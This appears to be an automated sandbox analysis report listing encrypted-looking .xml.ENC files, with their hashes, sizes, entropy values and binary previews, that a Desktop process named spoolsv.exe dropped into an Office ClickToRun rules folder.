                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...(.OdZ.........)..........%.e._...0.Fkhpc.d@...a...u...[0...P=>$HG=?7s..O..d.(..k. R.U._.o..6..d.e.j..j.E....!..|/eP.<..,.O..L.k...\Q...N_.P...x..H..[.U6........I.3..#q...GKl..hg.A..th.....Tu.t.5b.p-.. .....)....^.!.....D......T^.N.....Xn.I..j.=.. =J.v.n..,.U...[..z6k.......c..#....H%B2Z........gc..7*(.Y.j>O..QE.v...?..n.\EQ`.>....J..{C....<%..sO6.5....k.I"..:.ey}xHG.e.R.....Y..";.F....3.R..A...K.>...T....,..}OYe3....H..{.........~...".._..]...9....}"......O....'.[.0.1.....6!.V..K....".....{&.V...1......"..n......U....u.cD./.....V...2..$.z....3B.gq..'...........K<....U......?.Bt-E??...1..p...M.w.....t...C......Y......Z...H.&.|z.*...5.Z..E.,;R..0..).....p)..% ...N.._..u.t...AK.p4a.@@M.A.K.5.<1...B..Q..~...5..i.`....1..V...j{<}..p'.0...Z1....)#:...&.9..;*l.>x..,........y..8..^S.a..2....l.?r._8.`........#.....l.)..#..P%.a...;.N.t%...Ks+gxR.W.N.......n@.2S2.x.m.:e.H.W..l.T0...s.DR"...n..e-.).

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11981v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.541723397080758
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7rOOkdz6hQ8BFooY1FYOEiUeEhlITnrlvanpGE3FsEen:+++Pz6hbTY1JEiqh2r9qGaKn
                                                                                                                                                                                                                                                      MD5:4831C4741CE2F07EA345BB8BCC1AC091
                                                                                                                                                                                                                                                      SHA1:54967D456D28E5382F5575E9706A697737DA3A95
                                                                                                                                                                                                                                                      SHA-256:D0BE8C6F7A2264E3D3B359ABCB99736B0AAD6EB6F3D89354060B24EE50FC716E
                                                                                                                                                                                                                                                      SHA-512:0AE584092868A8C21E5AF7BD073E9AC553E12EEB1CBC980BBD50486867401B83A59FB64EBADC3B1A6BA0C55900807FAD284C71BE3C4FA0CCC6FE97CAEA745AC2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.........#fh.8.I.Pk.g.b*..N`.R..%..V.xU...'X.......}....d.O.D.I...........k..7.X.Q...m..v.@..&/..u.!......".K....E%...M[. p....Im....^.3.'..Vb..e=37..l)...t....R.'.f].Ke.pYFp+S..m.[..Y..@r.J.....a....}.b{...w..K+v.((.6'O.......E\..C.mu.g.M..._.W.73...D.......A..C.+..@k.Cuvd[.1.....-....;.~...o]...'6...'..MdR'T'<ya...b.Y...S..FV...%.E.*V*.5..6dV.}.?."..O..k......Z.......w..`.[.......L.c2.....l...OT.|3....b.l..(....Y...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11989v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):704
                                                                                                                                                                                                                                                      Entropy (8bit):7.680755379969421
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7PqqRsC+pBDc1ZbNCBwl3qICOsALoDIGdmyEtfyenDxGAuAA7MMYTg1:++jDRrmZc1d4Bwl3qICOWEtDnDxSwMV
                                                                                                                                                                                                                                                      MD5:D629A8878E6EF14C6C78A38FA47246A1
                                                                                                                                                                                                                                                      SHA1:B85B5058F7A95A677C5F96AB2B394584E7227321
                                                                                                                                                                                                                                                      SHA-256:1EAD9D0B40BA99458DF57EEBE08FC8BBC194CC79D57406C73B3ED003A6F1DD23
                                                                                                                                                                                                                                                      SHA-512:73373F43978EA954FA4F2BA795116EDC421966707B691A09A07871F0A919341BD10D9C4B9FF84E001BC012BFF1056853EC95BD91DBB4486FE70F911C33A87051
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...@/:.&...p..2..j..i$>3...I.I.Ajpd....,..G...YS".K.S.YM[q:.4.H..K.k.gk.D..5.G...~~h.j..A...ECH.i..zA.^pl.9.{gjt..A.....:.o....6...d...@...,)#..w..2..J...tL..Xv/v.{.m.}.. ...S.......E0.j. ..-A|I._..7lI1..#.......;d....q...&.l..jx.C.....sfz...Y.Z.....dYG..x......Z.t.`..N<s.f..e..#.$.I!B...._..|.~8.aB~..wi.Y;.|..L."S.Ll(:..h...l.3.....5..gKp.F..k<.\q..]..KR.a.|..2.Q...F....#....Q...-.......$...a..k./.T|uO.....K......i0.^.._..@...B....N.h....zD.....=...3.L.l.....ih.9o.....Fw^....:...~.(.?u.......a......[.i..P.$.{&~..ee.....l.....m-Q..{..q.g..d,A.)o+0X!.Z...D.(....C-|.Q..'...{..w.tI..H.j...T...z......>..2....'...b...V...9.(

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120100v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1008
                                                                                                                                                                                                                                                      Entropy (8bit):7.784757308058819
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++lvCFOCtH9QDCaxqV6H2NjbY7YGP4TVWvOPVG5TYon4aueQn4W:++lvCQI9oxqVsdMGP4ZCKaueQn4W
                                                                                                                                                                                                                                                      MD5:02A2662F66F25575D6E75BAECCDD11AC
                                                                                                                                                                                                                                                      SHA1:7FB2C0A0260D7A928680E347F79D3971AC06174E
                                                                                                                                                                                                                                                      SHA-256:4CB974966FCC92CD2BC70D8CD51E740A36D496BA55F4C95F4412A8B9EFD7684C
                                                                                                                                                                                                                                                      SHA-512:E7F411928D5ADCE65C35F05DEB0681019EAE8F95845D562D70BA781668C416646922F79B83FC28A84688948E5CB4372D25BD56451AA91C14F5DFA9E9DDBB10CC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.%.7.o..K....~.Sb.m.0.:9.E.:....*...E....w#.A.P.m.....b.@....PM.-bt.l.qJ:..Yj*.s..g.}....).r....T.k..kW.M...g..m.`..s..>P...}v....f....X.w.b...dl.{..f...5. ..}.r.u.e..Y:.^....p_(IkJ.kP].8.k+.<i......X.H..!..aarP.$..".D.g..5.I.`...D..s*.........Nl.....PV.*.g)..../.......f.U.4:$......*.{ ...y..P.y}.V.(.c....l..W...~.x.,1m..y..%.u..u.j6..;.=u8.f.$....8........p.g.....G.BlL.u....P......d.prt...Kb...6..:E.z^..o...c.....K.X...+v...M.n.&..F......P....:."...ZM.=g...j..v........}.G.{.W..EY.D........[p;...M.......*Fe..l.<. ..N....vB.........0y.+x.K._rS...Hi..o.7.........`8..@J./].:2./ME....aj;b..h.$Uk..9z.A.....A.....$.T..`...'0.N../..m....`.....g...{0.p...rM..\.o.e.K.......e..3........{..=...u.\.f.?a..'..b....:.6.&8..S..&.0.f<*','t?.....\.y........".G!l..}u...*A..7..M<W.5..t.~.h..:W.4Q.\+.z.%c...;.s~...Cz....k......[.o.n7#.U.:6WH..$u..)......,%.z...N.|...I>.t.....2{....x..'..x..,].~X.K'..q..=..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120119v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1344
                                                                                                                                                                                                                                                      Entropy (8bit):7.843644101971335
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/1ZczYrXK3IB6al+eaRjpRKgg/b6/iBW2YWk2QyBoUeeP2EfpJkpa9Z6:/IYrhB6ashB/Xg+sHCHyBotevpE
                                                                                                                                                                                                                                                      MD5:C5E283BF07BF10FFE0D6C9DDACDDDBD4
                                                                                                                                                                                                                                                      SHA1:F3E66BB25C59623CC834D592551CE75AAB767744
                                                                                                                                                                                                                                                      SHA-256:7720828DEEC3FD220186AE907321329894CEA70F1BEDCEF046729488DA104E6B
                                                                                                                                                                                                                                                      SHA-512:3D3DDC405D65DC422195475ECE101E154E75A38EC688B800EF10AAF210DF0E89C81C35B0DDCAFE0752103D98130D7B3232D5026F3A6683B3A4782A86A6B022E3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....kiO....4Y....3 ...A_Fp..I..x_.J./.1RtU......V|..,".......B,.......3..I.R...ra....k.I(.^..p...#.;.,.s<...<.jh...s{j...j..]D:.V.}M..T....@;...zE.f.J.u.2.... X..2..H$Dp...O..X.O,...$......Ua6).Y.>XX.q.ekp..+|9....]U......g...._G.[.p..uw.3../h.>g.....y.rpt~y$..Z.^Z.....buJ)i.\.%....N...~..:.akXXb3M...~$."r...&...4..........F..G./..x.6.'.......U....<[.-.../...@.;......e.^......O..O v.k#...{.'.B..7W.P&E...v....I4.~....&%..1....#z...gJ.:....^..L...... p...x....Y.Y0....n..p.v.W.k......^..M...J.O^"x.s.+..&F..@r.q ....4...5.....'.'.z...w~.e..e.}.P..x.../7$..P*E..g.I.T.F".o..G..9.J..k.YE.?......-1.E..9..#.$.......=N}.:.\....4mJ..75."N..F.."|...|....E.o2...NHhg8&k.A....(....-...z...l....I0r..A5......H......V.h8...Yl....pC..a.p...N.GW..e>.3.~.>.E.....s%.)..3."...o-7hD./..6=2....|.@.t.$.H.q...aQm.#'..J...O."*......<...C.....k...=Dl.. ..d.N.....l........R...Q.....q..a)...f.(a...fW.........zcL\..r....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120128v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):672
                                                                                                                                                                                                                                                      Entropy (8bit):7.683039757723003
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s269OCUezs8A17JUSFchR9IiaASoITz4RqdvzF4ltRCruWQglB:/P8SUCcja2Sz4RqBzFS0r6eB
                                                                                                                                                                                                                                                      MD5:150D18F974247E0A94E6CF07F64CD142
                                                                                                                                                                                                                                                      SHA1:1D6EE1C4856DA19C94D5B70B28E39DA7B87068AD
                                                                                                                                                                                                                                                      SHA-256:9BB44F3035466B9B367329F67787CF3B20C1C7876E4228F256411EB1019C0E2B
                                                                                                                                                                                                                                                      SHA-512:BED64281F3EF17F3229B033C048464E6BAF29C8D225A1A5E0C3F0A7CBE872114378F2DD0DD8493240F8FA2B318F1649413EF7430AB16AB6F98BC97B2EC757F0C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..\.@......[Z.fP.........Z.~{.O0...^....(.8....{.....2..ft.O)...j.\g`...l.Z.~jZ|Q.....".)Dj.Na.n..D.e8...C..8._..9rQ..K....$60.+.h.......[P].p .`c.2.@.!...<....v.9.r.....T..I.d]......_.]...D.%...R....\...(....X..A.^b1P.....$)......v.5.+.|....0>......l.. ..{...$.Oj. /...cC. @.~....I..C(&.@.....6....O..LG[..gn..7..I.../v..%.........j.8...z..uP$\..>d.x.O...|iF..........t.....i.0.K.U.-.D./....{.z1.k3....".^.UH.Xi&....+.e.e...wP...(R&UO.....x...;B..<]b.e.J:UYUeX..[.o......_1.N..a....Gc>..8.Z|..=D.....K:Ho.>$.t..?|Q..#....F.^.|..N...}B...M...p...@{...+..g.h.dW...QT.E.>...R....zW...L..)...#...../.".~../..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule12019v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3824
                                                                                                                                                                                                                                                      Entropy (8bit):7.950610100995882
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:+++dFvCX6defSJZD8OxDceLU1Sw5ewYog2nPR:+++dhCX6dkSTXxceqgwhXnJ
                                                                                                                                                                                                                                                      MD5:30CA37873B5C5663DA6E2F9C5176D740
                                                                                                                                                                                                                                                      SHA1:15D22B54A56240E536002DBA4B83CEFF00C69A53
                                                                                                                                                                                                                                                      SHA-256:8835F531F15380893C6BF02A05D8A5B7033C1DCD828A10244170353E747AD535
                                                                                                                                                                                                                                                      SHA-512:4F1433F8A74118E8E36628915EBDB3925EA923FEF2F0D22C07D5DBB2C0D343306E6E559A97E529FC4EA374015307A617E3F7AD853A530C937978AFBF9EE65D89
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f@.....|.Wq._...}.v..rH.....M.'..C..........?..8.'n..T)..U..6AyN..d...........M..W5...B.~."}.AS.G|......c....o....T8r....pC....-'9N...I....}.......jV/..#x....eA...DzU.[.+i.....X.K...At....p.j...em...<.a...|a^.pL.....~\.Y.j..~..N.....+....../.o.....Z.. ..."i...X.......K..Pd..B^,.G)...m1..X...P.h.^..C.j=.ip.4!..3 -'a.....kI.....s..d.k\...;.......zE..W...@...EB..+.6.J..n..k..E..)..*m..I.6d...U....+....>.A~p..z.l.r.......@.:r...p....5..N......a.,U...s.OsOO.=..D((....;.....\...H.....j..8.....'..R.$..,..%$...X.e..Q.....j.Pt...S..'HA..h....7.^\.I..t..U.Ugi...E..L...n.@.y..3..i..e...28.......|.0t9.`.......%.&..q.K.....`.f....^v'FC.~......&d._4.....}^DVM;......5X3 ..u...L_.X(!..I..k..%..'.;~br.p.w...3f....!..}IAW.."........g.~..9..P.m..>.{...6.8..n...6.<'....f.XYU..Q.a.......Yz.. .:~"t..........r..3)%yG..E ..N......NOF..tP.<@`..>..Q._".....t..........\'O.....i..H7ZC.....r{..>.c....h..c~X@..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule12035v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2480
                                                                                                                                                                                                                                                      Entropy (8bit):7.927724548848387
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++evnV/w6OJtlkr8qH/4e7scBQJVsQ5aHNVyH8pcC:++SwAr8qTIc69wNVW8V
                                                                                                                                                                                                                                                      MD5:6AE387B417575BABF9AEA7DD7E8EF18F
                                                                                                                                                                                                                                                      SHA1:3CF72D475CE50A97DB97C82F2B1FBA5D07AFC704
                                                                                                                                                                                                                                                      SHA-256:8461438C38A90C4368C8341CF4E180243B47D410BAB61A05B759D4B7101CB826
                                                                                                                                                                                                                                                      SHA-512:9F9BB49D52CA335B5AFA09A061F153474DBFB5FA23E8E442684A13647601389C00E017467E86E91B9625CBCEBEE8DD7D313D6D7034CB571B17B963C7AFCB50DE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...".t.7J........./...V..RS...l.d......b"...N..+:.W..b4p.|...}=.U..2.a@.,2.B.9..eU......+E..;#..........=.<`..X.t/..E.S...@....Y{.8IF..."j....(j.O,....1V..|..Y..'x.. ....RR.o..1k+.....}H;:.a........43~S.)V.!V.._.~.]^(.7#6.H.d..6(..~H.n.[&...6iqe.f.f...H.6#E.....'5I+.[,..........'....a.|..*..7.../...fE"..,k.8.8._.E...b.....g.`..|.g...D.f.[....A.0.H.... .H6<8..*..fU..L.3p,w./....[.|-.............a..t.mx..m.U.......j6.7~.&..`..C..z...`.|.v`.!pXO...$.....^3Y.V.}L....m..*..(.XX............d.....@oS.+..T.....p. 9:..........Z."Z(..q...T.]....>B.37.N...l.p./....>.slG.. ......K...a.M>....R.._..v.~......A...d{..x...M.[....[(.G..U..I.e.r.[....bi..DO.W.....7i.a....}....Z...R.A5.Yx.;s.8<../.W.a...*X.nV.A_......E.]P..../.p....@.j..&..OQ6/.............Y...6j.W...2>#.Oz...X...9u..x..V..9.7.@....th].z.V.h.t.A.4L.IiLt.....r....R.x.'0...........sV_v.....s..yN..zVD.......S._..Y.`:.....&..l.....\].....@............q...Mo.L..NQ.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120402v21.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3792
                                                                                                                                                                                                                                                      Entropy (8bit):7.952895264465435
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:BI0ItSVl+JdnstpeP+q+wkpMAToiiRAgNxx6+AcT:BVVsdMpeP+iyeiyJNxx6+x
                                                                                                                                                                                                                                                      MD5:E271BBCE62AAB5A64CDA63EA6259BEEF
                                                                                                                                                                                                                                                      SHA1:CC26E915E18152DA30F43768CC5B0290310D4FB2
                                                                                                                                                                                                                                                      SHA-256:58101E95F30FB367A421A6093C8AAD48536645B6CA780DB2433A3F1089721BA2
                                                                                                                                                                                                                                                      SHA-512:0E188D26241063AECF73BB5D9CD2284A888F2D0247CB6100747968681506C96B445BBEA896E08964AD8DEFEB369A80C91AE906BCF09E460CFAE03DD9785B23BA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....iLX.4..a#..A=(.G~5x.r.S./D....'mh?......md.e.!..*OM_.../.....abc..1oa...g..gH=z..6y..........>J}l..v.Rb2..2.<..2..$...+fZ!..2]../.I..(.g...g.T...A.|...~....*.....?..._.........q...En.I/.(...6R.C~o......z.0.{H.'...Z.,.........a$.1....jS0j..Sb..X.Tio..;.=W_.......<..LK.d.(...0.p..*...c..*..)u.\q...K..6.....r.+..Y.M~.[..B....E.A.sn..o.Q3S~...S.$s...cs...|...3B.6..k.$....j.W...2(......bP..Ho'.l$.....]...V..i..w.j....|...... .w...u...n..]$>u...U.8..F.N.N...+.-.Q*..4~...d.'.^H...L.0.kyp....Xr.F5B...B.D..|9E.N.&...S.....o.y\....)@......4...1L.wFc+]o....-#.=...D/.......aw=LN.Li.H...I.ficA:.G.J..9....oY..Q.....!.k.{...F...............V#Ex..h^..n.....rk-..z%8...^....t...K43...CW..........C....-.j...@....w.Jo.....^I...s.....Z+.y .... .....~v.E.I...pDaj..:....".+.6.-....z.vM../.r?.w.1...xH.wA.;ya.........".......]..)..v...n:y.6.9..-.~rc:....y#>c`..S....#.\O.C..F....bd.iN.gx3..q.....b..j...IqBA1C5..~

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120600v4.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2992
                                                                                                                                                                                                                                                      Entropy (8bit):7.941267310363307
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/4zNqiulLMcU5nXZGnJtX2JvOvcqU48uEyA78ZTFDuklBDN4P57W6Sv7Zl9qMpXA:AsieMcUvuJ8JhGXlBWh7W6alsEw
                                                                                                                                                                                                                                                      MD5:6CFFC915F55F976EA015E67D17C19505
                                                                                                                                                                                                                                                      SHA1:24D87D62DE273BD6E4DFAD0EFA9569350BCBE844
                                                                                                                                                                                                                                                      SHA-256:9F9C5E968BDBABC9CFC68BED8CF2106A660A2040D7097C8B6B98D2727C520390
                                                                                                                                                                                                                                                      SHA-512:828240B70D853E2E0B11837290EC97D2A7EFEBFB2A0FC220663CBA38831B7C7B67F6AB2EBA226C3E9BFFADAC8593B4B308C266AB6494E6AC339BAF2BC6514F02
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.UJ9....<..:$m.7.^.`..=.........a...e_..{...h.?...J..Ly....Fw....g;sV...{^q....T0+ri.../q.b..G...nH...U..W.-...RM.......K.\.QI......C...!.Z1.2,.-r`" .3.....L.......a.<h.y.!..Zd..,.(.L.Z...f..".#..c.[R5.....-..)c...|a(.|i...M...I..//ZT....*}%F*..jv...8...4..O{RV1.g4.Az...Uq.#x...4.I...qU......~@.5..9.....(..".[...&d..>..h&..i|.......B!@.J.S..l9|...yg.:.Z...x.m{.H..S.:..w....K.Yy......c.....H.f.Y.P.....`....j.Z..].+...$./.Y!.......C..}/E.=T}.K.m.4.1...0}) .[-l..r.@.....c...^B.~.G]..%=C..I..E..<......*#..@.C...Bd...9v.X..R....j./._$.....,.{A.U...W..3..g..I..Jx..B._n4.f....=./-.....Q...E:n G1.~.@.N...MB%...!.....v.U.&.....(.TaS..V]g.|....}p.....-E/7/...]e.4.i...-30s]..........7....r..z.).....,...s....x..+}@+' n.u.pH.vy......z......I....'+xz....J...-.9....A.Z..<. .Wp...n..8.k<."".%.7..{P..jK...P....b.._'..........SB_.....[...I...#.....2~.x..U..D..J...D+. ..8H4".s.{W.'......o...`.{~.i.....&.......u..P

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120601v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3344
                                                                                                                                                                                                                                                      Entropy (8bit):7.948422375395846
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/WRwBSbG/FIX4iHYOgiNT+dR5XlKL1t2C4r1cut4KNzmR2XWg7vOJRUy+3J02rtz:pAiNIIiJgGe5Xs7H4xlc6vKJZ+3i2Bz
                                                                                                                                                                                                                                                      MD5:78F2C3DE51768EDA1E0EB5744F2DA398
                                                                                                                                                                                                                                                      SHA1:8CEC68BAEEEE2798EF78A229CE66468E70ACCFB0
                                                                                                                                                                                                                                                      SHA-256:448D1C2ACB6B3D8E5279E9F84526361C742995F4DC17704AE430E679793D12CE
                                                                                                                                                                                                                                                      SHA-512:F681D08401AF5929D5098F543B92034BE43B9E6E76E1D6DAE270D26A4C866D2E6BE6ED1B8A1EA0E1174FC5E222D7435016430357160330E727776CE3BFF45F0A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.B+h).......\.>...,7X...z..._....'.F...p.....VP...I[....{.X..L..9........=-.%...*.mZ&.A#...4.......;..Y%......?/.s.H..K.\.iB.K.....< b......Z~R..[O&.<=....E..V.....Y.N.1.1.2K....+..,r..}Y~.-.p..i...P.1..!G..0...2Q..z..d.....+_..Mgb6/.}f.G..{hpj.GI.q.4.......pA."....=......q.....?K.l`..g+Uf....#3b...n..H".|}..sa..\..........sx..Yk.dQ...UG....)......q......7.d..h.......}&T../..Ku?..t....cz..=EEOjV...... FP.e..Q..+?.../J...\....H;}.h...5k,..|.`.:.2Z...D}y.U....i.|.5....U1]R..C..../Z..V...e.....5.$&.T....?.Z.."|j..M..<..>hC.XjZ`t....K.-..CJ)..3.[.u..7_....&...0.....X.cYLq..i...k..O|.b...q..........,.s......Z..0Cu.....J`..s..]j.s..dT..k......?......F...rt.._&,..q.2V5=,.{.H....$..9......~.X.Q.Q..U.bP...W;...?.....+...L....Z.:../.~J.....l..n.R.,g...h..=.o.....'9.`..z....F|.....J.]S.uBE.:i..*._O|.Z.Z.5.A.kiZ.........7..tR.e.hA...7d...T.!..r.u.ga."....+.......j..nz...o...h.. .90.....S....F9.....i..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120602v8.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2592
                                                                                                                                                                                                                                                      Entropy (8bit):7.924903427978639
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/C4Swa1vEJ8HyOTHGvM480azDF+6I0yH1t7jEoAMirxi5aLLu1:FDaEyavM4a93wtsF9M5anu1
                                                                                                                                                                                                                                                      MD5:31B59B3F3558AD57355E6A7796A451BC
                                                                                                                                                                                                                                                      SHA1:6C17E8CB3CB284883D46F483897E6BBD3CC9D0E1
                                                                                                                                                                                                                                                      SHA-256:BC03A916F5C4F1997C92ED8BC0B5220CDB301514CDA25ECC7A0CE72EEE4D2067
                                                                                                                                                                                                                                                      SHA-512:5D406EDF2DEA666172302A0C365F906537C4E38691264424AC9407926700B67DD52E28182C0E1517CAE220D050B2E40B791E03BB492DA7F4FB4FBAEE85CFCFC0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.P..`..o..7..............;L.B...l.....,.....I.v.B...J.u........U......u.3........^Kb7&...>..<...*a...r.0A.5.uQ=..e.o.....H...7...f..t.......Bm.'.)....JX,5..]..u. .....b.....s.'.s...X.C..BZV&.\.3..U.k......L.............<i...uA......q..0(.(...[..g..4...-.VO........JP.....9........e..n...g....2...).a.........GI\5og..~......w.%.M.....7..i..-*.....'..Y..a.jB.O~..N.>.H.. .a........l..A........L.h.Nq..j..{?.W..J..g..Y5...}..L.=x...q.C..mS.7..A..2..u...\.H-6...&S.3.Dm...Qi.<~..!O.a<.2.F`C.....i/.....C.&.!...@lk..$.C.g..c...J..>..bD.I....x..n....)t.|..1.\..".KZC..\...__...Sf......S2...#Hl..."...%.0...LN...i.....J.....b.&.N/....)$.6....=..p.l.M..m...d.6/......U.yd.cj?Y.@......5H]vV.R..= CK.q., ,M...Sc..,..e.pK.g.4...2 h.Hx.S..=...y.....V}....1...W..u"J..<A7...~.....T^s.N..9Z?d...o.0.C.......Y...N.....d/.r,%...u<.$..8sq]C"z.^..8..z.]Tf...o..goc.....N...@X...yq.....y.o.@.:k..,._y."...d......8.V.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120603v8.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2144
                                                                                                                                                                                                                                                      Entropy (8bit):7.910285261080911
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/HqdR5Z1K/2X9PhOtwU0q0xXtmK39VASQamiLK5nXr:6fZQ/2NppNtm29UqMXr
                                                                                                                                                                                                                                                      MD5:727AD09109EDF0122126AD82C747FFE1
                                                                                                                                                                                                                                                      SHA1:E415CB3D9780F6335A5C34658F06190259E7DE32
                                                                                                                                                                                                                                                      SHA-256:2C10D5DCF08A5C579E9539AF7571452AFE309AA14DA9F983F9E0F4C4FAD032A2
                                                                                                                                                                                                                                                      SHA-512:3D1321184CBD3169C0A03ADD4DB0529D88D548C14D46AA53C48A96F5546BDF4408464773139243106DDC24065D29FC4DD46682C6D5E2241DD7FE173F71F7C947
                                                                                                                                                                                                                                                      Malicious:false
